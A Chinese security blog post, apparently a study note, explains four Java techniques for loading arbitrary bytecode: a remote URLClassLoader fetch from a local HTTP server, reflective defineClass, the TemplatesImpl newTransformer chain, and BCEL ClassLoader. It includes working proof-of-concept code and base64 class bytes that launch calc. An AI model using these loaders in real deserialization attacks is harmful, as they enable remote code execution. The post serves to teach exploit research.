加载字节码的几种方式

最新推荐文章于 2024-03-20 19:53:35 发布
最新推荐文章于 2024-03-20 19:53:35 发布
阅读量4.2k 收藏
点赞数 1
分类专栏: java安全 文章标签: java intellij-idea 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47886905/article/details/123667060
版权

前言

要学shiro发现要会cc3,要会cc3发现要先学字节码哈哈哈

正文

利用ClassLoader加载远程字节码

poc

import java.io.IOException;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLClassLoader;

public class ClassLoader {
    public static void main(String[] args) throws IOException, ClassNotFoundException, InstantiationException, IllegalAccessException {
        URL[] urls = {new URL("http://127.0.0.1:8000/")};
        URLClassLoader classLoader = URLClassLoader.newInstance(urls);
        Class c = classLoader.loadClass("Exec");
        c.newInstance();
    }
}

构造一个恶意的类

import java.io.IOException;

public class Exec {
    public Exec() throws IOException {
        Runtime.getRuntime().exec("calc");
    }
}

利用javac编译成class文件生成Evil.class。或者直接在编译器运行,编译后的class文件

image-20220311154847291

在存放字节码的目录,开启服务。例如我在桌面存放的字节码,在桌面开启服务后桌面就会作为根目录

image-20220311155113750

执行poc加载http://localhost:8000/Exec.class,

可以看到服务端收到了请求

image-20220311155352061

并且执行了命令

image-20220311155447854

利用ClassLoader#defineClass 直接加载字节码文件

不管是加载远程class还是本地class或者Jar,java都要经历三个方法的调用

ClassLoader#loadClass
	ClassLoader#findClass
		#ClassLoader#defineClass

先利用刚刚生成的Exec.class生成base64字符(因为Exec.class存在不可见字符)

image-20220311161457675

利用defineClass加载字节码

import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.net.MalformedURLException;
import java.util.Base64;

public class ClassLoaderTest {
    public static void main(String[] args) throws MalformedURLException, ClassNotFoundException, IllegalAccessException, InstantiationException, NoSuchMethodException, InvocationTargetException, InvocationTargetException {
        Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass",String.class,byte[].class,int.class,int.class);
        defineClass.setAccessible(true);
        byte[] code = Base64.getDecoder().decode("yv66vgAAADEAHwoABgASCgATABQIABUKABMAFgcAFwcAGAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAGTEV2aWw7AQAKRXhjZXB0aW9ucwcAGQEAClNvdXJjZUZpbGUBAAlFdmlsLmphdmEMAAcACAcAGgwAGwAcAQAEY2FsYwwAHQAeAQAERXZpbAEAEGphdmEvbGFuZy9PYmplY3QBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAUABgAAAAAAAQABAAcACAACAAkAAABAAAIAAQAAAA4qtwABuAACEgO2AARXsQAAAAIACgAAAA4AAwAAAAQABAAFAA0ABgALAAAADAABAAAADgAMAA0AAAAOAAAABAABAA8AAQAQAAAAAgAR");
        Class Evil = (Class)defineClass.invoke(ClassLoader.getSystemClassLoader(),"Evil",code,0,code.length);
        Evil.newInstance();
    }
}

image-20220311161547213

利用TemplatesImpl加载字节码

虽然大部分上层开发者不会直接使用到defineClass方法,但是Java底层还是有一些类用到了它(否则他
也没存在的价值了对吧),这就是 TemplatesImpl

com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl 这个类中定义了一个内部类TransletClassLoader

    static final class TransletClassLoader extends ClassLoader {
        private final Map<String,Class> _loadedExternalExtensionFunctions;

         TransletClassLoader(ClassLoader parent) {
             super(parent);
            _loadedExternalExtensionFunctions = null;
        }

        TransletClassLoader(ClassLoader parent,Map<String, Class> mapEF) {
            super(parent);
            _loadedExternalExtensionFunctions = mapEF;
        }

        public Class<?> loadClass(String name) throws ClassNotFoundException {
            Class<?> ret = null;
            // The _loadedExternalExtensionFunctions will be empty when the
            // SecurityManager is not set and the FSP is turned off
            if (_loadedExternalExtensionFunctions != null) {
                ret = _loadedExternalExtensionFunctions.get(name);
            }
            if (ret == null) {
                ret = super.loadClass(name);
            }
            return ret;
         }

        /**
         * Access to final protected superclass member from outer class.
         */
        Class defineClass(final byte[] b) {
            return defineClass(null, b, 0, b.length);
        }
    }

看到在TransletClassLoader这个类里面重写了defineClass方法。而这个类没有注明类型,默认为default只能为内部调用。

所以要找利用defineClass的链子。

image-20220313132519541

发现只有一个方法调用了它

image-20220313132551196

就是defineTransletClasses,再看谁调用了defineTransletClasses,找到三个结果这里使用getTransletInstance

image-20220313132817191

再看谁调用了getTransletInstance,发现 newTransformer调用了它,且这个方法是public可以直接进行外部调用

image-20220313132917046

这样利用链就出来了

TemplatesImpl#newTransformer() ->TemplatesImpl#getTransletInstance() -> TemplatesImpl#defineTransletClasses()-> 
TransletClassLoader#defineClass()

在TemplatesImpl中存在一个构造器

public TemplatesImpl() { }

可以利用这个构造器获取类

public class template {
    public static void main(String[] args) throws TransformerConfigurationException {
        Templates templates = new TemplatesImpl();
    }
}

跟进到newTransformer#getTransletInstance()

image-20220313143550222

根据利用链想要执行defineTransletClasses要满足两个条件 __name不为空且_class为空

private Translet getTransletInstance()
    throws TransformerConfigurationException {
    try {
        if (_name == null) return null;

        if (_class == null) defineTransletClasses();

_name和 _class默认是null,所以我们要修改 _name的值

定义一个反射的方法来修改参数的值

    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj,value);
    }

现在的Poc是

public class template {
    public static void main(String[] args) throws Exception {
        Templates templates = new TemplatesImpl();
        setFieldValue(templates,"_name","Demo");

    }
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj,value);
    }
}

继续往下走有几个条件

private void defineTransletClasses()
        throws TransformerConfigurationException {

        if (_bytecodes == null) {
            ErrorMsg err = new ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR);
            throw new TransformerConfigurationException(err.toString());
        }

        TransletClassLoader loader = (TransletClassLoader)
            AccessController.doPrivileged(new PrivilegedAction() {
                public Object run() {
                    return new TransletClassLoader(ObjectFactory.findClassLoader(),_tfactory.getExternalExtensionsMap());
                }
            });

        try {
            final int classCount = _bytecodes.length;
            _class = new Class[classCount];

            if (classCount > 1) {
                _auxClasses = new HashMap<>();
            }

            for (int i = 0; i < classCount; i++) {
                _class[i] = loader.defineClass(_bytecodes[i]);
                final Class superClass = _class[i].getSuperclass();

_bytecodes不能为空

中间的run方法调用了_tfactory.getExternalExtensionsMap(),跟进一下getExternalExtensionsMap()发现

image-20220313145157601

setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());

再往下

try {
            final int classCount = _bytecodes.length;
            _class = new Class[classCount];

            if (classCount > 1) {
                _auxClasses = new HashMap<>();
            }

            for (int i = 0; i < classCount; i++) {
                _class[i] = loader.defineClass(_bytecodes[i]);
                final Class superClass = _class[i].getSuperclass();

_bytecodes[0]就该是我们要加载的类的字节数组,所以

先生成字节码,

TemplatesImpl 中对加载的字节码是有一定要求的:这个字节码对应的类必须 是 com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet 的子类。

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

public class EvilTest extends AbstractTranslet{

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
    public EvilTest() throws Exception{
        Runtime.getRuntime().exec("calc");
    }
}

编译java文件生成字节码。

        byte[] bytes = Base64.getDecoder().decode("yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgcAGwEAClNvdXJjZUZpbGUBAA1FdmlsVGVzdC5qYXZhDAAOAA8HABwMAB0AHgEABGNhbGMMAB8AIAEACEV2aWxUZXN0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAMAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAAEQALAAAABAABAAwAAQAOAA8AAgAJAAAALgACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAABAAoAAAAOAAMAAAASAAQAEwANABQACwAAAAQAAQAQAAEAEQAAAAIAEg");

写入字节码

setFieldValue(templates,"_bytecodes",new byte[][]{bytes});

image-20220313152548814

利用BCEL ClassLoader加载字节码

image-20220322173941142

先写一个恶意类

import java.io.IOException;

public class Evil {
    public Evil() throws Exception{
        Runtime.getRuntime().exec("calc");
    }
}

执行字节码

import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.bcel.internal.classfile.JavaClass;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import com.sun.org.apache.bcel.internal.util.ClassLoader;

import javax.rmi.CORBA.Util;
import java.io.IOException;

public class BECL {
    public static void main(String[] args) throws IOException, ClassNotFoundException, InstantiationException, IllegalAccessException {
        JavaClass cls = Repository.lookupClass(Evil.class);
        String code = Utility.encode(cls.getBytes(),true);
        System.out.println(code);
        new ClassLoader().loadClass("$$BCEL$$"+code).newInstance();


    }
}

只有加上$$BCEL$$才会进行decode字节码,loadClass会判断类名

参考:
P神java漫谈
feng师傅:https://ego00.blog.csdn.net/article/details/119763746

@Demo
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java字节码框架ASM操作字节码的方法浅析
08-31
每条字节码指令对应一个特定的操作,如加载或存储变量,调用方法等。字节码的表示方式通常使用类型签名,这是JVM用来表示方法参数和返回值类型的字符串形式。 类型签名是一种规范,例如`long f (int n, String s, ...
java字节码框架ASM的深入学习
08-31
Java开发中,字节码框架ASM提供了一种强大的工具,允许程序员在运行时动态生成或修改类。ASM是一个底层的库,它直接操作Java字节码,这使得开发者能够在运行时改变类的行为或创建新的类。本文将深入探讨ASM框架的...
taofang_v66.zip_STM32 OFDM_STM32 16QAM_STM32 FFT模块_STM32 OFDM
07-14
雅克比迭代求解线性方程组课设,STM32制作的MP3的全部资料,ofdm系统仿真 含16qam调制 fft 加窗 加cp等模块。
fensui_v66.zip_wolf_潮流计算
07-14
wolf 方法计算李雅普诺夫指数,多机电力系统仿真及其潮流计算,使用起来非常方便。
tao_v66.zip_snr crb
07-14
最大信噪比的独立分量分析算法,现代信号处理中谱估计在matlab中的使用,有均匀线阵的CRB曲线。
java审计CC链1-7学习
superprintf的博客
01-06 852
[基础知识] CC链(apache common collections组件漏洞利用链) ysoserial java动态代理 Javassist动态编程 [分析] freebuf文章
陇原战役2021 ezjaba
weixin_45805993的博客
11-15 1155
题目分析 spring-boot 用的ROME1.0 ysoserial上的利用链,可见是通过HashMap触发的 题中ban掉了HashMap 但可以发现下面直接调用了toString方法,所以我们直接截取利用链的后一半,反序列化ObjectBean并调用toString即可 exp package com.summer.rome; import com.summer.util.SerializeUtil; import com.sun.org.apache.xalan.internal.xsl
java字节码编辑器
07-26
Java字节码编辑器是一种工具,它允许开发者直接编辑Java程序编译后的`.class`文件,而不是反编译后再重新编译。这种编辑器对于理解、调试和优化Java代码非常有用,尤其是对于那些无法访问源代码或者需要进行底层操作...
javassist试图简化Java字节码的编辑
08-06
它提供了一种高级的表示形式,使得开发者可以更容易地理解和操作字节码,而不是直接与复杂的ClassFile结构打交道。 在`javassist`中,主要的概念有以下几个: 1. ** CtClass **:这是`javassist`的核心类,代表一...
python字节码详细介绍共2页.pdf.zip
10-30
Python字节码是Python解释器在执行Python源代码之前处理的一种中间表示形式。它是一种低级的、平台无关的指令集,类似于Java字节码。理解Python字节码有助于优化程序性能,因为通过分析字节码,我们可以了解Python...
java实现dex文件方法字节码隐藏
05-01
字节码隐藏是一种常见的代码混淆技术,它通过改变方法名、变量名以及方法体的字节码,使得原始的逻辑变得难以理解和追踪。 实现这个目标通常涉及以下几个步骤: 1. **字节码解析**:首先,我们需要一个能够解析Dex...
字节码查看器.rar
07-22
字节码查看器则为我们提供了一种直观的方式,来查看和分析这些二进制的类文件,更好地理解Java程序的运行机制。本文将围绕“字节码查看器”这一主题,深入探讨字节码的概念、作用以及如何利用字节码查看器进行分析。...
Java 字节码简单说明.zip
03-11
Java字节码是一种低级的、平台无关的指令集,它是Java源代码经过编译器处理后的产物。每条字节码指令通常只占用一个或两个字节,因此得名“字节码”。这种设计使得Java程序能够跨平台运行,因为字节码并不直接对应于...
Java虚拟机字节码.zip
11-06
Java虚拟机字节码技术是Java编程中的核心概念,它涉及到程序的运行方式以及如何与Java虚拟机(JVM)交互。ASM框架是这个领域的一个关键工具,它提供了一种低级别的字节码操作能力,使得开发者能够进行深度的代码分析...
JAVA字节码操作库 BCEL源码
05-15
总之,BCEL是一个强大的工具,它为Java开发人员提供了一种底层操作Java字节码方式,对于那些需要对代码进行深度定制和优化的项目来说,BCEL是一个不可或缺的库。通过深入学习和掌握BCEL,我们可以更灵活地控制程序...
一起来学字节码插桩:ASM Tree API
小马快跑的博客
03-22 925
ASM是一个通用的Java字节码操作和分析框架。它可用于修改现有类或直接以二进制形式动态生成类。ASM提供了一些常见的字节码转换和分析算法,可以根据这些算法构建定制的复杂转换和代码分析工具。ASM提供了与其他Java字节码框架类似的功能,但更关注性能。因为它的设计和实现尽可能的小和快,它非常适合在动态系统中使用(但当然也可以以静态的方式使用,例如在编译器中)。关于ASM更多介绍,可以参见ASM官网。ASM从组成结构上可以分成两部分,一部分为Core API,另一部分为Tree API。
[Java安全入门]六.CC3
最新发布
qq_34942239的博客
03-20 1199
前几天学了一下cc1和cc6,对于我来说有点小困难,不过经过几天沉淀,现在也是如拨开云雾见青天,经过一上午的复习对cc1和cc6又有深入的了解。所以,今天想多学一下cc3。cc3执行命令的方式与cc1和cc6不一样,不是通过ChainedTransformer来执行,而是通过动态加载类执行。
Jacoco字节码植入原理(源码分析)
lxlmycsdnfree的博客
01-12 5497
首先了解jacoco agent入口类(MANIFEST.M文件声明): 入口类—PreMain: 代码: packageorg.jacoco.agent.rt.internal_6da5971; importjava.lang.instrument.Instrumentation; importorg.jacoco.agent.rt.internal_6da5971.core.
轻量级的日志追踪框架TLog。10 分钟即可接入!
没有伞的孩子必须努力奔跑!—小林
11-13 2120
开始文章之前,且听我简单BB几句。 国产开源之路不易,好的国产开源项目还是太少太少了。国内一些用心做开源的技术人基本都是靠爱发电。 今天介绍的这个日志框架的作者自己维护了 3 个开源框架,为此他经常忙到凌晨1,2点。目前,这个日志框架目前仍在开发中。不得不说的是!这个项目整体的代码质量很高,非常值得小伙伴们学习一波! 前言 随着微服务盛行,很多公司都把系统按照业务边界拆成了很多微服务,在排错查日志的时候。因为业务链路贯穿着很多不同微服务,同一个微服务又可能部署着十几个节点,要排查某一个请求的日志,总

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值